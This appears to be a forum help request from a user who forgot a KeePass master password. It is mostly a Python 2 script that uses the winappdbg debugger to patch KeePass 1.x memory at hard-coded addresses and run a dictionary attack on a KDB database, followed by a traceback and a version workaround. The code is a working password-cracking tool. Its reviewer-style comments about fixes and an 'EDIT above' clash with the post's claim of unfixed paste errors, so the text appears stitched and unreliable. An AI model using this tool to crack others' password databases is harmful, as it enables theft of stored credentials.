So I have forgotten my master password ~_~ I was storing all my passwords in a KeePass database file. Now I have found this article http://blog.q-protex.com/2010/03/14/keepass-self-bruteforce/ and installed the required version of Python and winappdbg-1.3.win32. I have modified the source code so it looks like this:
from winappdbg import Debug
from time import strftime
import time
import os.path
# Shared state for the breakpoint callbacks defined below.
counter = 0      # index into `words` of the candidate currently being tried
word = ""        # the candidate most recently written into the debuggee
words = []       # candidate list; filled from the dictionary file later in the script
# Register snapshot taken by action_0 and restored by action_3.
r_eax, r_ecx, r_edx = 0, 0, 0
WORD_SIZE = 20   # bytes reserved for a candidate, including its terminating NUL
#Save the state of the registers
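def action_0(event):
    """Snapshot Eax, Ecx and Edx of the thread that hit this breakpoint.

    The values go into the module globals r_eax/r_ecx/r_edx so that action_3
    can write them back. The pasted version declared ``r_rdx`` as global
    (a typo), which turned the Edx assignment into a local and left the
    global r_edx at its initial value of 0 for action_3 to restore.

    Args:
        event: winappdbg breakpoint event; only ``get_thread()`` is used.
    """
    global r_eax, r_ecx, r_edx
    thread = event.get_thread()
    r_eax = thread.get_register("Eax")
    r_ecx = thread.get_register("Ecx")
    r_edx = thread.get_register("Edx")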
#Write the word
def action_1(event):
    """Copy the current candidate into the debuggee at the address in Ecx.

    Takes ``words[counter]`` (both module globals), drops its trailing
    newline, truncates it so that it plus a NUL terminator fits in WORD_SIZE
    bytes, and pokes it into the process at the address Ecx holds when this
    breakpoint fires. The candidate is also kept in the module global
    ``word`` so that action_2 can print it.

    Args:
        event: winappdbg breakpoint event; uses ``get_thread()`` and
            ``get_process()``.
    """
    global word
    thread = event.get_thread()
    process = event.get_process()
    buffer_addr = thread.get_register("Ecx")
    candidate = words[counter].replace("\n", "")[:WORD_SIZE - 1]
    # candidate = candidate.lower()  # optional, as in the original script
    word = candidate
    process.poke(buffer_addr, word + "\0")
#Check the flag state
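def action_2(event):
    """Read the comparison result and either stop or retry with the next word.

    The zero flag of the halted thread is taken as the outcome of the
    debuggee's check (set means the candidate was accepted). On success the
    index and the candidate are printed and the process is killed. On
    failure, while words remain, ``counter`` advances and Eip is set to
    0x004D6699 so the check runs again with the next candidate; when the
    list is exhausted the process is killed.

    Fix: the pasted version had the condition split over two lines
    (``if counter<:`` / ``len(words)-1``), which is a syntax error; it is
    the single comparison ``counter < len(words) - 1``.

    Args:
        event: winappdbg breakpoint event; uses ``get_thread()`` and
            ``get_process()``.
    """
    global counter
    thread = event.get_thread()
    accepted = thread.get_flag_value(thread.Flags.Zero)
    if accepted:
        print 'Counter: ' + repr(counter) + ' - Correct: ' + word
        event.get_process().kill()
        return
    print 'Counter: ' + repr(counter) + ' - Incorrect: ' + word
    if counter < len(words) - 1:
        counter += 1
        # Address taken from the original script; presumably the retry point
        # of the check for the targeted KeePass build -- verify for other builds.
        thread.set_register("Eip", 0x004D6699)
    else:
        # Every candidate has been tried and none was accepted.
        event.get_process().kill()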
#Restore the registers to the original state
def action_3(event):
    """Restore the registers saved by action_0 and resume at 0x004DC395.

    Writes the module globals r_eax/r_ecx/r_edx back into Eax/Ecx/Edx and
    then sets Eip to the address at which action_0's breakpoint is placed.

    Args:
        event: winappdbg breakpoint event; only ``get_thread()`` is used.
    """
    thread = event.get_thread()
    for reg_name, saved in (("Eax", r_eax), ("Ecx", r_ecx), ("Edx", r_edx)):
        thread.set_register(reg_name, saved)
    thread.set_register("Eip", 0x004DC395)
#Specify a dictionary here
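# One candidate per line; action_1 strips the newline that readlines() keeps.
with open('dic.txt', "r") as dictionary:
    words = dictionary.readlines()
print "[+] Words Loaded: ", len(words)
#Specify a key file
# NOTE(review): this is the same file as the dictionary, so KeePass is told to
# use dic.txt as the database key file. Unless the database was really created
# with that key file, every candidate is rejected regardless of the password --
# confirm this value.
keyfile = "dic.txt"
# Created outside the try block: the original had debug = Debug() inside it,
# so a failure there made the finally clause raise NameError on debug.stop()
# and hide the real error. t1 is bound here for the same reason (the timing
# therefore includes process start-up).
debug = Debug()
t1 = time.clock()
try:
    # '-pw:' is padded to WORD_SIZE + 4 characters (4 for '-pw:' itself), as in
    # the original script; presumably this reserves room for the candidate that
    # action_1 writes -- verify against the KeePass build in use.
    if os.path.isfile(keyfile):
        print "[+] Keyfile Loaded: '" + keyfile + "'"
        argv = ['KeePass.exe', 'db.kdb', '-keyfile:' + keyfile, '-pw:'.ljust(WORD_SIZE + 4)]
    else:
        print "[+] Specified keyfile '" + keyfile + "' does not exist, ignoring argument"
        argv = ['KeePass.exe', 'db.kdb', '-pw:'.ljust(WORD_SIZE + 4)]
    aProcess = debug.execv(argv)
    pid = aProcess.get_pid()
    # Set the breakpoints. The addresses are hard-coded for the KeePass build the
    # original post targeted (the EDIT above says 1.07 resolves the earlier
    # error); on another build they will not fire and KeePass just runs with the
    # padded blank password.
    debug.break_at(pid, 0x004DC395, action_0)
    debug.break_at(pid, 0x004D77A0, action_1)
    debug.break_at(pid, 0x004D6684, action_2)
    debug.break_at(pid, 0x004DC39A, action_3)
    #Wait for the debugee to finish
    debug.loop()
finally:
    debug.stop()
    print 'Finished in ' + repr(time.clock() - t1) + ' seconds!'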
Now when I run the script I get the following error:
Python 2.6.4 (r264:75708, Oct 26 2009, 08:23:19) [MSC v.1500 32 bit (Intel)] on win32
Type "copyright", "credits" or "license()" for more information.
****************************************************************
Personal firewall software may warn about the connection IDLE
makes to its subprocess using this computer's internal loopback
interface. This connection is not visible on any external
interface and no data is sent to or received from the Internet.
****************************************************************
IDLE 2.6.4 ==== No Subprocess ====
>>>
[+] Words Loaded: 82740
[+] Keyfile Loaded: 'dic.txt'
Traceback (most recent call last):
File "D:\Keepass Self-Bruteforcer - KDB\Script1.py", line 79, in <module>
debug.break_at(aProcess.get_pid() , 0x004DC395, action_0)
File "D:\Phyton264\lib\site-packages\winappdbg\breakpoint.py", line 3415, in break_at
self.enable_code_breakpoint(pid, address)
File "D:\Phyton264\lib\site-packages\winappdbg\breakpoint.py", line 2453, in enable_code_breakpoint
bp.enable(p, None) # XXX HACK thread is not used
File "D:\Phyton264\lib\site-packages\winappdbg\breakpoint.py", line 860, in enable
self.__set_bp(aProcess)
File "D:\Phyton264\lib\site-packages\winappdbg\breakpoint.py", line 836, in __set_bp
aProcess.mprotect(address, mbi.Protect)
TypeError: mprotect() takes exactly 4 arguments (3 given)
>>>
Before the error appears, KeePass displays 2 warning dialogs (both say that the password is wrong), and then two instances of KeePass.exe are open.
In the folder where the Python script is located I placed the dic.txt, db.kdb and KeePass.exe files. KeePass.exe was downloaded from PortableApps and the version is 1.28.
EDIT: download KeePass 1.07 from here: http://sourceforge.net/projects/keepass/files/KeePass%201.x/1.07/KeePass-1.07.zip/download and replace it in the folder. This will solve the error.
But I still face a problem in the source code itself. The website that hosts the Python script no longer offers the source code as a downloadable file, only as a script embedded in the blog post. I have tried to format it where I can, but I have no knowledge of Python. Now when I run the script again the same thing happens: two instances of KeePass.exe are opened and a warning message says that the password is wrong. I understand that this is the result of a bad copy/paste of the source code.